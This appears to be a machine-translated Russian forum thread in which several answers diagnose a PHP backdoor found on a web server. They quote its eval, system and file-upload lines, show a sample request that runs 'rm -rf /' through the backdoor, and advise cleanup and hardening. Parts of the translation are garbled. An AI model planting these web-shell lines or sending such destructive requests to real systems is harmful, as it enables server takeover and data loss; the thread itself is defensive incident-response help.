Ага, это вредоносный код. Этот сценарий оболочки позволит выполнить код, а также загрузить любой файл, если злоумышленник знает переданные ему параметры. Я рекомендую поискать этот код во всех файлах, проверить права доступа к файлу и на всякий случай сменить пароли.

Предложение по борьбе с атакой

Я бы посоветовал вам использовать HTML Purifier или OWASP , чтобы сделать вещи более безопасными.

Вы должны отключить конструкцию eval , если вы ее не используете (и не должны этого делать, если вам это действительно не нужно).

Проанализируйте настройки сервера на наличие дыр в безопасности с помощью:

PHPSecInfo

_{(источник: phpsec.org )}

Для справки:

if($e){eval($e);}

Это позволяет злоумышленнику выполнить любую команду PHP, которую он хочет.

if($s){system($s);}

Это позволяет злоумышленнику выполнять любую системную команду, которую он хочет, в качестве любого пользователя, от имени которого работает ваш веб-сервер.

if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}

Это позволяет злоумышленнику загружать любой файл, который он хочет - опять же, права доступа к файлу определяет пользователь вашего веб-сервера.

Итак, panic :-p

Я уверен, что в Интернете есть много статей о том, как с этим бороться. Короче говоря, сделайте резервную копию своей системы для анализа позже, переустановите сервер с нуля (вы не знаете, что еще они сделали с вами, поэтому простого удаления файлов недостаточно.), Пытаясь понять, как они попали и затыкание дыры.

Удалите их справа СЕЙЧАС !

Это бэкдор на ваш веб-сервер.
Он позволяет злоумышленникам отправить запрос на http://you.com/goog1e7a20543b128921.php?s=rm -rf / на удаление всей вашей системы.

Затем вам следует провести тщательную проверку безопасности вашего сайта, чтобы выяснить, как они вообще туда попали.

eval ($ e) - команда удаленного выполнения система - экв. для каталога listind $ _FILES ['f'] ['name'] - для скрипта загрузки в серверные средства взлома эквалайзера и т. Д.

Связано: Попробуйте установить phpAntiVirus на будущее, и попросите провайдера установить mod_security. Это может смягчить будущие взломы. Эти файлы в любом случае не материализовались сами по себе на вашем сервере. Избавьтесь от всех старых PHP-приложений.

по-видимому, не только у вас есть это. погуглил очень быстро, другие сайты тоже кажутся зараженными. похоже, что зараженный файл все время сохраняется в папке изображений.

Ищите это в каждом файле. Если вы обнаружите его с помощью вашего ftp, посмотрите дату изменения файла и откройте все измененные файлы. в эту дату и удалить его.